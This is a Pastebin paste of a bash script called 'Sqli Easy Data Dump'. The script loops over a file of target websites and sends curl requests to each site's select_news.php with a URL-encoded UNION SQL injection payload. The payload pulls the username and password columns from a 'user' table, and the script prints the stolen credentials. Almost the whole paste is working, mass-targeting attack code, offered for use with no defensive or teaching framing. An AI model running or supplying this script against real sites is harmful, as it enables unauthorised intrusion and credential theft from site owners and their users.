Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/bash
- clear
- filename=$1
- filelines=`cat $filename`
- echo "====================="
- echo " Sqli Easy Data Dump "
- echo "====================="
- echo "Use $0 targetfile.txt"
- echo "if you want to save as text file;"
- echo "Use $0 targetfile.txt >> savefile.txt"
- echo ""
- for line in $filelines ; do
- echo "Site" $line
- echo "================"
- rm -rf user.txt
- curl -s "$line/select_news.php?news_id=1%27%20and%20false%20union%20select%201,2,3,concat(%27%3Cdiv%20id=dumpusername%3E%27,user_name,%27%3C/div%3E%3Cdiv%20id=dumppassword%3E%27,user_pass,%27%3C/div%3E%27),5,6,7,8,9%20from%20user%20limit%200,1--%20-" | nokogiri -e 'puts $_.css('\''div#dumpusername'\'').text' >> user.txt
- tav=`tac user.txt | grep -m 1 '.'`
- if [ ${#tav} -gt 1 ]
- then
- echo -n "Username : "
- curl -s "$line/select_news.php?news_id=1%27%20and%20false%20union%20select%201,2,3,concat(%27%3Cdiv%20id=dumpusername%3E%27,user_name,%27%3C/div%3E%3Cdiv%20id=dumppassword%3E%27,user_pass,%27%3C/div%3E%27),5,6,7,8,9%20from%20user%20limit%200,1--%20-" | nokogiri -e 'puts $_.css('\''div#dumpusername'\'').text'
- echo -n "Password : "
- curl -s "$line/select_news.php?news_id=1%27%20and%20false%20union%20select%201,2,3,concat(%27%3Cdiv%20id=dumpusername%3E%27,user_name,%27%3C/div%3E%3Cdiv%20id=dumppassword%3E%27,user_pass,%27%3C/div%3E%27),5,6,7,8,9%20from%20user%20limit%200,1--%20-" | nokogiri -e 'puts $_.css('\''div#dumppassword'\'').text'
- else
- echo "Can't dump"
- fi
- echo "================"
- echo ""
- done
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement